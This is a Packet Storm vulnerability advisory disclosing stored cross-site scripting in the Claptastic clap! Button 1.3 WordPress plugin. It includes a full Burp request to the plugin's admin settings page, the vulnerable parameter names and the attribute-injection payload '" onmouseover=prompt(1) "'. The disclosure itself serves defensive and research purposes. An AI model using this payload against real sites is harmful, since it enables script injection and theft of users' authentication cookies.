WordPress Claptastic Clap! Button 1.3 Cross Site Scripting

2016-03-28T00:00:00
ID PACKETSTORM:136443
Type packetstorm
Reporter Sachin Wagh
Modified 2016-03-28T00:00:00

Description

                                        
                                            `Product: Claptastic clap! Button  
  
Exploit Author: Sachin Wagh  
Version: 1.3  
  
Home page Link: https://wordpress.org/plugins/claptastic-clap-button/  
  
============================================================================  
  
  
  
Details:  
  
The Claptastic clap! Button plugin for WordPress is prone to a multiple  
cross-site scripting vulnerability because it fails to sufficiently  
sanitize user-supplied input.  
  
An attacker may leverage these issues to execute arbitrary script code in  
the browser of an unsuspecting user in the context of the affected site.  
This may allow the attacker to steal cookie-based authentication  
credentials and to launch other attacks.  
  
============================================================================  
  
Proof-Of-Concept:  
  
1. Burp Request :  
  
POST  
/wordpress-4.4/wordpress/wp-admin/options-general.php?page=claptastic-clap-button.php  
HTTP/1.1  
  
Host: localhost  
  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101  
Firefox/45.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
Referer:  
http://localhost/wordpress-4.4/wordpress/wp-admin/options-general.php?page=claptastic-clap-button.php  
  
Cookie: wp-saving-post=18-check;  
wordpress_9053f69aa70f4fc50a08aff40972c70e=root%7C1459165865%7CivjDqmsChZ8j6hYjxAbiE1UfNv0GuLQmaYDV6ReX2Dn%7C2d5e155d52adb160536eaf3540daee34cbbbb19bf07fe3a0c2f60775431aa010;  
wp-settings-time-1=1458990477;  
wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dexcerpt%26uploader%3D1%26widgets_access%3Doff;  
wordpress_test_cookie=WP+Cookie+check;  
wordpress_logged_in_9053f69aa70f4fc50a08aff40972c70e=root%7C1459165865%7CivjDqmsChZ8j6hYjxAbiE1UfNv0GuLQmaYDV6ReX2Dn%7Ce0b893f18be591d73b25f60efbdc24477131766dbec5b7895c630f1cb7b96d55;  
security_level=0; _ga=GA1.1.1331075502.1458634204;  
PHPSESSID=4gaqfar5bmtmrnpana3a6crff6  
  
Connection: keep-alive  
  
Content-Type: application/x-www-form-urlencoded  
  
Content-Length: 181  
  
  
  
ccb_fontsize=XSS-1&ccb_position=bottomright&ccb_margin=XSS-2&ccb_paddingrightleft=XSS-3&ccb_design=XSS-4&ccb_onfrontpage=no&update_ClaptasticClapButtonPluginSettings=Update+Settings  
  
2. Payload : " onmouseover=prompt(1) "  
  
============================================================================  
  
Vulnerable Product: [+] Claptastic clap! Button 1.3  
  
  
Vulnerable Parameter(s):  
  
[+]ccb_fontsize  
  
[+]ccb_margin  
  
[+]ccb_paddingrightleft  
  
[+]ccb_design  
  
============================================================================  
  
Affected Area(s):  
  
[+]  
http://localhost/wordpress-4.4/wordpress/wp-admin/options-general.php?page=claptastic-clap-button.php  
  
  
============================================================================  
  
Credits & Authors :  
  
Sachin Wagh (@tiger_tigerboy)  
  
============================================================================  
`